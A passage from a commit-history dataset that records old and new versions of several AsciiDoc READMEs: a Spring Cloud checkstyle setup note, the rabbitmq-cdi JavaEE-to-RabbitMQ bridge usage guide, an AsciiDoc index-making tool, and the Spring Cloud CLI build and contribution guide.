JUnit assertions\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-checkstyle.png[Checkstyle]\n\nGo to `File` -> `Settings` -> `Other settings` -> `Checkstyle`. There click on the `+` icon in the `Configuration file` section. There, you'll have to define where the checkstyle rules should be picked from. In the image above, we've picked the rules from the cloned Spring Cloud Build repository. However, you can point to the Spring Cloud Build's GitHub repository (e.g. for the `checkstyle.xml` : `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle.xml`). 
We need to provide the following variables:\n\n- `checkstyle.header.file` - please point it to the Spring Cloud Build's, `spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` URL.\n- `checkstyle.suppressions.file` - default suppressions. Please point it to the Spring Cloud Build's, `spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` URL.\n- `checkstyle.additional.suppressions.file` - this variable corresponds to suppressions in your local project. E.g. you're working on `spring-cloud-contract`. Then point to the `project-root\/src\/checkstyle\/checkstyle-suppressions.xml` folder. Example for `spring-cloud-contract` would be: `\/home\/username\/spring-cloud-contract\/src\/checkstyle\/checkstyle-suppressions.xml`.\n\nIMPORTANT: Remember to set the `Scan Scope` to `All sources` since we apply checkstyle rules for production and test sources.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44de5d63a70d893f2e2408d6f13567798c8a7177","subject":"Adds link to maven central","message":"Adds link to maven central","repos":"reinhapa\/rabbitmq-cdi","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Provides a JavaEE Event <--> RabbitMQ bridge.\nPatrick Reinhart <https:\/\/github.com\/reinhapa[@reinhapa]>\n:project-name: rabbitmq-cdi\n:group-name: net.reini\n:project-full-path: reinhapa\/{project-name}\n:github-branch: master\n\nimage:https:\/\/img.shields.io\/badge\/license-MIT-blue.svg[\"MIT License\", link=\"https:\/\/github.com\/{project-full-path}\/blob\/{github-branch}\/LICENSE\"]\nimage:https:\/\/img.shields.io\/badge\/Java-8-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-9-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-10-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-11-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-12-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/github\/release\/{project-full-path}.svg[\"Release\", link=\"https:\/\/github.com\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/maven-central\/v\/{group-name}\/{project-name}.svg?label=Maven%20Central[\"Maven Central\", link=\"https:\/\/search.maven.org\/search?q=g:%22{group-name}%22%20AND%20a:%22{project-name}%22\"]\nimage:https:\/\/img.shields.io\/travis\/{project-full-path}\/{github-branch}.svg[\"Build Status\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/codecov\/c\/github\/{project-full-path}\/{github-branch}.svg[\"Code Coverage\", link=\"https:\/\/codecov.io\/github\/{project-full-path}?branch={github-branch}\"]\nimage:https:\/\/codecov.io\/github\/{project-full-path}\/branch.svg?branch={github-branch}[codecov.io]\n\nThis project contains all needed classes to bind JavaEE enterprise events to 
a\nRabbitMQ exchange for outgoing events. Inbound events can also be bound to the\nrespective queues and will be handed over to all JavaEE event observers.\n\nThe RabbitMQ message content is created via JSON serialization of a Java Bean\ncompatible PoJo object and vice versa.\n\n== Usage example\n\nFirst you need to define event objects using standard Java Bean syntax:\n\n[source,java]\n----\npublic class EventOne {\n  private boolean enabled;\n\n  public boolean isEnabled() {\n    return enabled;\n  }\n\n  public void setEnabled(boolean enabled) {\n    this.enabled = enabled;\n  }\n}\n\npublic class EventTwo {\n  private String value;\n\n  public String getValue() {\n    return value;\n  }\n\n  public void setValue(String value) {\n    this.value = value;\n  }\n}\n----\n\n\nAs a second step you have to define the bindings:\n\n[source,java]\n----\n@Dependent\npublic class RabbitBinder extends EventBinder {\n  @Override\n  protected void bindEvents() {\n\n    ExchangeDeclaration testExchangeOne = declarerFactory()\n        .createExchangeDeclaration(\"test.exchange.one\")\n        .withExchangeType(BuiltinExchangeType.DIRECT)\n        .withAutoDelete(false)\n        .withDurable(false); \/\/ <1>\n\n    QueueDeclaration testQueue = declarerFactory()\n        .createQueueDeclaration(\"test.queue\")\n        .withAutoDelete(false)\n        .withDurable(false)\n        .withExclusiveAccess(false); \/\/ <2>\n\n    bind(EventOne.class)\n        .toExchange(\"test.exchange.one\")\n        .withDeclaration(testExchangeOne); \/\/ <3>\n    bind(EventOne.class)\n        .toExchange(\"test.exchange.two\")\n        .withRoutingKey(\"test.key\")\n        .withEncoder(new MyCustomEncoder()); \/\/ <4>\n\n    bind(EventTwo.class)\n        .toQueue(\"test.queue\");\n    bind(EventTwo.class)\n        .toQueue(\"test.queue\")\n        .withDecoder(new MyCustomDecoder())\n        .withDeclaration(testQueue)\n        .autoAck(); \/\/ <5>\n  }\n}\n----\n<1> Creates exchange declaration for exchange with name 'test.exchange.one' and type 'direct'\n<2> Creates queue declaration for queue with name 'test.queue'\n<3> Uses an empty routing key for exchange 'test.exchange.one' and adds exchange declaration for this publisher\n<4> Specifies a custom event encoder\n<5> Specifies a custom event decoder, enables auto acknowledge and adds queue declaration for this consumer\n\nA note on declarations:\n\nCreated declarations are not automatically declared on the broker side.\nEach consumer\/producer uses its own channels; for that reason it is necessary to\nadd the needed declaration to a binding via `.withDeclaration(..)`.\nOnly these declarations are applied for that consumer\/producer.\n\n\nAs the last step you need to initialize the binder either in a singleton\nstartup bean or servlet after having also configured the connection settings:\n\n[source,java]\n----\n@Singleton\n@Startup\npublic class BindingInitializer {\n  @Inject\n  private RabbitBinder binder;\n\n  @PostConstruct\n  public void initialize() {\n    try {\n      binder.configuration()\n          .addHost(\"somehost.somedomain\") \/\/ <1>\n          .setUsername(\"myuser\") \/\/ <2>\n          .setPassword(\"mypassword\") \/\/ <3>\n          .setSecure(true) \/\/ <4>\n          .setConnectTimeout(10000) \/\/ <5>\n          .setConnectRetryWaitTime(10000) \/\/ <6>\n          .setRequestedConnectionHeartbeatTimeout(3) \/\/ <7>\n          .withPrefetchCount(5); \/\/ <8>\n      binder.initialize();\n    } catch (IOException e) {\n      LoggerFactory.getLogger(getClass()).error(\"Unable to initialize\", e);\n    }\n  }\n}\n----\n<1> Specifies an AMQP host name (more than one can be added here)\n<2> Specifies a connection user name\n<3> Specifies a connection password\n<4> Enables the transport layer security (TLS)\n<5> Sets the connect 
timeout to 10 sec\n<6> Sets the time to wait between connection retries to 10 sec\n<7> Sets the heartbeat timeout to 3 sec (to detect connection problems)\n<8> Sets the prefetch count, which configures how many messages are downloaded at once from the broker\n\n\n=== Alternative connection definition\n\nAlternatively the connection can also be configured using a respective URI\nstring:\n\n[source,java]\n----\n@Singleton\n@Startup\npublic class BindingInitializer {\n  @Inject\n  private RabbitBinder binder;\n\n  @PostConstruct\n  public void initialize() {\n    try {\n      binder.configuration()\n          .setUri(\"amqp:\/\/user:mysecret@somehost.somedomain\/virtualhost\"); \/\/ <1>\n      binder.initialize();\n    } catch (IOException e) {\n      LoggerFactory.getLogger(getClass()).error(\"Unable to initialize\", e);\n    }\n  }\n}\n----\n<1> Specifies an AMQP connection URI\n\nMore information about the detailed URI can be found in the\nhttps:\/\/www.rabbitmq.com\/uri-spec.html[RabbitMQ URI specification].\n\n\n=== Multiple server connections\n\nIn case you have to support two different servers, create a binder implementation\nfor each host and initialize them in one single binding initializer:\n\n[source,java]\n----\n@Singleton\n@Startup\npublic class BindingInitializer {\n  @Inject\n  private RabbitBinder binderOne;\n  @Inject\n  private RabbitBinder binderTwo;\n\n  @PostConstruct\n  public void initialize() {\n    try {\n      binderOne.configuration()\n          .addHost(\"hostOne.somedomain\")\n          .setUsername(\"myuser\")\n          .setPassword(\"mypassword\");\n      binderTwo.configuration()\n          .addHost(\"hostTwo.somedomain\")\n          .setUsername(\"myuser\")\n          .setPassword(\"mypassword\");\n\n      binderOne.initialize();\n      binderTwo.initialize();\n    } catch (IOException e) {\n      LoggerFactory.getLogger(getClass()).error(\"Unable to initialize\", e);\n    }\n  }\n}\n----\n\n\n=== Usage in a container\n\nNow the events can be used within your JavaEE container:\n\n[source,java]\n----\npublic class EventDemoBean {\n  @Inject\n  private Event<EventOne> eventOnes;\n\n  public void submitEvent(boolean enabled) {\n    EventOne eventOne = new EventOne();\n    eventOne.setEnabled(enabled);\n    eventOnes.fire(eventOne);\n  }\n\n  public void receiveEvent(@Observes EventTwo eventTwo) {\n    String value = eventTwo.getValue();\n    \/\/ do some work\n  }\n}\n----\n\n\n== Contribute\n\nContributions are always welcome. Use https:\/\/google.github.io\/styleguide\/javaguide.html[Google code style format] for your changes. 
\n\n== License\n\nThis project is licensed under the https:\/\/github.com\/{project-full-path}\/blob\/{github-branch}\/LICENSE[MIT license]","old_contents":"= Provides a JavaEE Event <--> RabbitMQ bridge.\nPatrick Reinhart <https:\/\/github.com\/reinhapa[@reinhapa]>\n:project-full-path: reinhapa\/rabbitmq-cdi\n:github-branch: master\n\nimage:https:\/\/img.shields.io\/badge\/license-MIT-blue.svg[\"MIT License\", link=\"https:\/\/github.com\/{project-full-path}\/blob\/{github-branch}\/LICENSE\"]\nimage:https:\/\/img.shields.io\/badge\/Java-8-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-9-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-10-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-11-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/badge\/Java-12-blue.svg[\"Supported Versions\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/github\/release\/{project-full-path}.svg[\"Release\", link=\"https:\/\/github.com\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/maven-central\/v\/net.reini\/rabbitmq-cdi.svg?label=Maven%20Central[\"Maven Central\", link=\"https:\/\/search.maven.org\/search?q=g:%22net.reini%22%20AND%20a:%22rabbitmq-cdi%22\"]\nimage:https:\/\/img.shields.io\/travis\/{project-full-path}\/{github-branch}.svg[\"Build Status\", link=\"https:\/\/travis-ci.org\/{project-full-path}\"]\nimage:https:\/\/img.shields.io\/codecov\/c\/github\/{project-full-path}\/{github-branch}.svg[\"Code Coverage\", link=\"https:\/\/codecov.io\/github\/{project-full-path}?branch={github-branch}\"]\nimage:https:\/\/codecov.io\/github\/{project-full-path}\/branch.svg?branch={github-branch}[codecov.io]\n\nThis project contains all needed classes to bind JavaEE enterprise events to a\nRabbitMQ exchange for outgoing events. 
Inbound events can also be bound to the\nrespective queues and will be handed over to all JavaEE event observers.\n\nThe RabbitMQ message content is done via JSON serialization of a Java Bean \ncompatible PoJo object and vice versa.\n\n== Usage example\n\nFirst you need to define event objects using standard Java Bean syntax:\n\n[source,java]\n----\npublic class EventOne {\n private boolean enabled;\n\n public boolean isEnabled() {\n return enabled;\n }\n\n public void setEnabled(boolean enabled) {\n this.enabled = enabled;\n }\n}\n\npublic class EventTwo {\n private String value;\n\n public String getValue() {\n return value;\n }\n\n public void setValue(String value) {\n this.value = value;\n }\n}\n----\n\n\nAs second step you have to define the bindings:\n\n[source,java]\n----\n@Dependent\npublic class RabbitBinder extends EventBinder {\n @Override\n protected void bindEvents() {\n\n ExchangeDeclaration testExchangeOne = declarerFactory()\n .createExchangeDeclaration(\"test.exchange.one\")\n .withExchangeType(BuiltinExchangeType.DIRECT)\n .withAutoDelete(false)\n .withDurable(false); \/\/ <1>\n\n QueueDeclaration testQueue = declarerFactory()\n .createQueueDeclaration(\"test.queue\")\n .withAutoDelete(false)\n .withDurable(false)\n .withExclusiveAccess(false); \/\/ <2>\n\n bind(EventOne.class)\n .toExchange(\"test.exchange.one\");\n .withDeclaration(testExchangeOne) \/\/ <3>\n bind(EventOne.class)\n .toExchange(\"test.exchange.two\")\n .withRoutingKey(\"test.key\")\n .withEncoder(new MyCustomEncoder()); \/\/ <4>\n\n bind(EventTwo.class)\n .toQueue(\"test.queue\");\n bind(EventTwo.class)\n .toQueue(\"test.queue\")\n .withDecoder(new MyCustomDecoder())\n .withDeclaration(testQueue)\n .autoAck(); \/\/ <5>\n }\n}\n----\n<1> Create exchange declaration for exchange with name 'test.exchange.one' and type 'direct'\n<2> Creates queue declaration for queue with name 'test.queue'\n<3> Uses an empty routing key for exchange 'test.exchange.one' and adds exchange declaration for this publisher\n<4> Specifies a custom event encoder\n<5> Specifies a custom event decoder, enables auto acknowledge and adds queue declaration for this consumer\n\nNote to declarations:\n\nCreated declarations are not automatically declared on broker side.\nFor each consumer\/producer own channels exist because of that reason it is necessary to\nadd the declaration needed to a binding via .withDeclaration(..)\nOnly these declarations are applied for this consumer\/producer\n\n\nAs last step you need to initialize the binder either in a singleton\nstartup bean or servlet after having also configured the connection settings:\n\n[source,java]\n----\n@Singleton\n@Startup\npublic class BindingInitializer {\n @Inject\n private RabbitBinder binder;\n\n @PostConstruct\n public void initialize() {\n try {\n binder.configuration()\n .addHost(\"somehost.somedomain\") \/\/ <1>\n .setUsername(\"myuser\") \/\/ <2>\n .setPassword(\"mypassword\"); \/\/ <3>\n .setSecure(true) \/\/ <4>\n .setConnectTimeout(10000) \/\/ <5>\n .setConnectRetryWaitTime(10000) \/\/ <6>\n .setRequestedConnectionHeartbeatTimeout(3) \/\/ <7>\n .withPrefetchCount(5); \/\/8\n binder.initialize();\n } catch (IOException e) {\n LoggerFactory.getLogger(getClass()).error(\"Unable to initialize\", e);\n }\n }\n}\n----\n<1> Specifies a AMQP host name (there can be added more than one here)\n<2> Specifies a connection user name\n<3> Specifies a connection password\n<4> Enables the transport layer security (TLS)\n<5> Sets the connect timeout to 10 sec\n<6> Set the time to 
wait between connection retries to 10 sec\n<7> Set the heartbeat timeout to 3 sec (To detect connection problems)\n<8> Set the prefetch count which configures how many messages are downloaded at once from broker\n\n\n=== Alternative connection definition\n\nAlternatively the connection can also be configured using a respective URI\nstring:\n\n[source,java]\n----\n@Singleton\n@Startup\npublic class BindingInitializer {\n @Inject\n private RabbitBinder binder;\n\n @PostConstruct\n public void initialize() {\n try {\n binder.configuration()\n .setUri(\"amqp:\/\/user:mysecret@somehost.somedomain\/virtualhost\"); \/\/ <1>\n binder.initialize();\n } catch (IOException e) {\n LoggerFactory.getLogger(getClass()).error(\"Unable to initialize\", e);\n }\n }\n}\n----\n<1> Specifies a AMQP connection URI\n\nMore information about the detailed URI can be found in the\nhttps:\/\/www.rabbitmq.com\/uri-spec.html[RabbitMQ URI specification].\n\n\n=== Multiple server connections\n\nIn case you have to support two different servers, create a binder implementation\nfor each host and initialize them in one single binding initializer:\n\n[source,java]\n----\n@Singleton\n@Startup\npublic class BindingInitializer {\n @Inject\n private RabbitBinder binderOne;\n @Inject\n private RabbitBinder binderTwo;\n\n @PostConstruct\n public void initialize() {\n try {\n binderOne.configuration()\n .addHost(\"hostOne.somedomain\")\n .setUsername(\"myuser\")\n .setPassword(\"mypassword\");\n binderTwo.configuration()\n .addHost(\"hostTwo.somedomain\")\n .setUsername(\"myuser\")\n .setPassword(\"mypassword\");\n \n binderOne.initialize();\n binderTwo.initialize();\n } catch (IOException e) {\n LoggerFactory.getLogger(getClass()).error(\"Unable to initialize\", e);\n }\n }\n}\n----\n\n\n=== Usage in a container\n\nNow the events can be used within your JavaEE container:\n\nsource,java]\n----\npublic class EventDemoBean {\n @Inject\n private Event<EventOne> eventOnes;\n \n public void submitEvent(boolean enabled) {\n EventOne eventOne = new EventOne();\n eventOne.setEnabled(enabled);\n eventOnes.fire(eventOne);\n }\n\n public void receiveEvent(@Observes EventTwo eventTwo) {\n String data = eventTwo.getData();\n \/\/ do some work\n }\n}\n----\n\n\n== Contribute\n\nContributions are always welcome. Use https:\/\/google.github.io\/styleguide\/javaguide.html[Google code style format] for your changes. \n\n== License\n\nThis project is licensed under the https:\/\/github.com\/{project-full-path}\/blob\/{github-branch}\/LICENSE[MIT license]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"95f769f7b20f030780955ba38d5297fd62daa63d","subject":"Improve README","message":"Improve README\n","repos":"jxxcarlson\/asciidoctor-make-index","old_file":"README.adoc","new_file":"README.adoc","new_contents":"== Making an Index\n\n`make_index` is a Ruby program for generating\nan index for Asciidoc documents. At the\nmoment it requires the `Asciidoctor-LaTeX` extension.\n\n\n\n\nMark terms like this if you want them to appear\nin the document index:\n----\n ((potrezebie))\n----\nAssuming that your document is `foo.adoc`, do\nthis to make a version with an index:\n----\n $ ruby make_index.rb ..\/examples\/foo.adoc\n----\nExecution of this command produces\ntwo files, `foo-indexed.adoc`\nand `foo-indexed.html`. Here we assume\nthat you in the directory `make_index\/lib`.\n\nhttps:\/\/vschool.s3.amazonaws.com\/manuscripts\/462.html[Here]\nis an example of an Asciidoc document compiled\nwith an index. 
And\nhttp:\/\/www.noteshare.io\/lessons\/index-example-1?remote=true&view_mode=source[here]\nis a place to view the source text if you are\nlogged in to Noteshare. If you wish,\nyou can sign up for\na free account at\nhttp:\/\/www.noteshare.io[Noteshare.io].\n\n\n.Larger Example\nFor testing purposes, the 5900-word file\n`keynes_ch_2.adoc` is included.\nIt has a few terms marked for the\nindex. To play with it, do this:\n----\n $ ruby make_index.rb ..\/examples\/keynes_ch_2.adoc\n----\nThen view the file `keynes_ch_2-indexed.html`\nin your browser.\n\n=== Installation\n\n.Download from GitHub\n----\n $ git clone https:\/\/github.com\/jxxcarlson\/asciidoctor-make-index\n $ git clone https:\/\/github.com\/asciidoctor\/asciidoctor-latex\n $ cd asciidoctor-latex\n $ rake install\n----\n\nRun tests with `rspec spec\/make_index_spec.rb`.\n\n.Stopgap\nUntil I get things properly set up to build and install\na gem, you should also\nsay\n\n----\nalias makeindex=\"ruby $HOME\/dev\/git\/asciidoctor-make-index\/lib\/make_index.rb\"\n----\n\nThen you can run `makeindex foo.adoc` from anywhere.\n\n.Help needed\nWhen I run `rake install`, the gem is installed\nas `make_index (0.1.0)` (verified\nby running `gem list`), but when I run `$ make_index foo.adoc`\nI get the error 'make_index: command not found'.\n\n=== Notes\n\n. 
The index feature of Asciidoctor-LaTeX experimental.\nIt is designed to be syntax-compatible with the\ncorresponding feature for Asciidoctor when\nit is released. At that point,\n`make_index.rb` will be redundant.\n. The index feature has beeb rolled into\nhttp:\/\/www.noteshare.io[Noteshare.io]. The *Show Doc*\nitem in the *View* menu will compile the current notebook\nwith an index if the attribute `:make_index:` is set.\nSee http:\/\/www.noteshare.io\/section\/writing-tools#_index[this document]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9be47f709bb3c3e3e65fb1ea9deb42bbaf00dcef","subject":"Update readme for code of conduct.","message":"Update readme for code of conduct.\n\nhttps:\/\/github.com\/spring-cloud\/spring-cloud-build\/issues\/26\n","repos":"spring-cloud\/spring-cloud-cli,spring-cloud\/spring-cloud-cli","old_file":"README.adoc","new_file":"README.adoc","new_contents":"\/\/ Do not edit this file (e.g. go instead to docs\/src\/main\/asciidoc)\n\nimage::https:\/\/travis-ci.org\/spring-cloud\/spring-cloud-cli.svg?branch=master[Build Status, link=https:\/\/travis-ci.org\/spring-cloud\/spring-cloud-cli]\n\nSpring Boot CLI provides http:\/\/projects.spring.io\/spring-boot[Spring Boot] command line features for\nhttps:\/\/github.com\/spring-cloud[Spring Cloud]. You can write Groovy scripts to run Spring Cloud component applications\n(e.g. `@EnableEurekaServer`). You can also easily do things like encryption and decryption to support Spring Cloud\nConfig clients with secret configuration values.\n\n\n== Installation\n\nTo install, make\nsure you have\nhttps:\/\/github.com\/spring-projects\/spring-boot[Spring Boot CLI]\n(1.2.0 or better):\n\n $ spring version\n Spring CLI v1.2.3.RELEASE\n\nE.g. for GVM users\n\n```\n$ gvm install springboot 1.3.0.M5\n$ gvm use springboot 1.3.0.M5\n```\n\nand install the Spring Cloud plugin:\n\n```\n$ mvn install\n$ spring install org.springframework.cloud:spring-cloud-cli:1.1.0.BUILD-SNAPSHOT\n```\n\nIMPORTANT: **Prerequisites:** to use the encryption and decryption features\nyou need the full-strength JCE installed in your JVM (it's not there by default).\nYou can download the \"Java Cryptography Extension (JCE) Unlimited Strength Jurisdiction Policy Files\"\nfrom Oracle, and follow instructions for installation (essentially replace the 2 policy files\nin the JRE lib\/security directory with the ones that you downloaded).\n\n== Building\n\n:jdkversion: 1.7\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nFor hints on how to build the project look in `.travis.yml` if there\nis one. 
There should be a \"script\" and maybe \"install\" command. Also\nlook at the \"services\" section to see if any services need to be\nrunning locally (e.g. mongo or rabbit). Ignore the git-related bits\nthat you might find in \"before_install\" since they're related to setting git\ncredentials and you already have those.\n\nThe projects that require middleware generally include a\n`docker-compose.yml`, so consider using\nhttp:\/\/compose.docker.io\/[Docker Compose] to run the middeware servers\nin Docker containers. See the README in the\nhttps:\/\/github.com\/spring-cloud-samples\/scripts[scripts demo\nrepository] for specific instructions about the common cases of mongo,\nrabbit and redis.\n\nNOTE: If all else fails, build with the command from `.travis.yml` (usually\n`.\/mvnw install`).\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttp:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttp:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttp:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin for maven support. Other IDEs and tools\nshould also work without issue.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the http:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nUnfortunately m2e does not yet support Maven 3.3, so once the projects\nare imported into Eclipse you will also need to tell m2eclipse to use\nthe `.settings.xml` file for the projects. If you do not do this you\nmay see many different errors related to the POMs in the\nprojects. Open your Eclipse preferences, expand the Maven\npreferences, and select User Settings. In the User Settings field\nclick Browse and navigate to the Spring Cloud project you imported\nselecting the `.settings.xml` file in that project. Click Apply and\nthen OK to save the preference changes.\n\nNOTE: Alternatively you can copy the repository settings from https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/.settings.xml[`.settings.xml`] into your own `~\/.m2\/settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n==== Adding Project Lombok Agent\n\nSpring Cloud uses http:\/\/projectlombok.org\/features\/index.html[Project Lombok]\nto generate getters and setters etc. Compiling from the command line this\nshouldn't cause any problems, but in an IDE you need to add an agent\nto the JVM. Full instructions can be found in the Lombok website. 
The\nsign that you need to do this is a lot of compiler errors to do with\nmissing methods and fields, e.g.\n\n[indent=0]\n----\nThe method getInitialStatus() is undefined for the type EurekaInstanceConfigBean EurekaDiscoveryClientConfiguration.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 120 Java Problem\nThe method getInitialStatus() is undefined for the type EurekaInstanceConfigBean EurekaDiscoveryClientConfiguration.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 121 Java Problem\nThe method setNonSecurePort(int) is undefined for the type EurekaInstanceConfigBean EurekaDiscoveryClientConfiguration.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 112 Java Problem\nThe type EurekaInstanceConfigBean.IdentifyingDataCenterInfo must implement the inherited abstract method DataCenterInfo.getName() EurekaInstanceConfigBean.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 131 Java Problem\nThe method getId() is undefined for the type ProxyRouteLocator.ProxyRouteSpec PreDecorationFilter.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/zuul\/filters\/pre line 60 Java Problem\nThe method getLocation() is undefined for the type ProxyRouteLocator.ProxyRouteSpec PreDecorationFilter.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/zuul\/filters\/pre line 55 Java Problem\n----\n\n==== Importing into Intellij\nSpring Cloud projects use annotation processing, particularly Lombok, which requires configuration\nor you will encounter compile problems. It also needs a specific version of maven and a profile\nenabled. Intellij 14.1+ requires some configuration to ensure these are setup properly.\n\n 1. Click Preferences, Plugins. *Ensure Lombok is installed*\n 2. Click New, Project from Existing Sources, choose your spring-cloud-sleuth directory\n 3. Choose Maven, and select Environment Settings. *Ensure you are using Maven 3.3.3*\n 4. In the next screen, *Select the profile `spring`* click Next until Finish.\n 5. Click Preferences, \"Build, Execution, Deployment\", Compiler, Annotation Processors. *Click Enable Annotation Processing*\n 6. Click Build, Rebuild Project, and you are ready to go!\n\n==== Importing into other IDEs\nMaven is well supported by most Java IDEs. Refer to you vendor documentation.\n\n\n== Contributing\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/support.springsource.com\/spring_committer_signup[contributor's agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. 
Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are expected to uphold this code. Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. If using IntelliJ, you can use the\n http:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow http:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).","old_contents":"\/\/ Do not edit this file (e.g. go instead to docs\/src\/main\/asciidoc)\n\nimage::https:\/\/travis-ci.org\/spring-cloud\/spring-cloud-cli.svg?branch=master[Build Status, link=https:\/\/travis-ci.org\/spring-cloud\/spring-cloud-cli]\n\nSpring Boot CLI provides http:\/\/projects.spring.io\/spring-boot[Spring Boot] command line features for\nhttps:\/\/github.com\/spring-cloud[Spring Cloud]. You can write Groovy scripts to run Spring Cloud component applications\n(e.g. 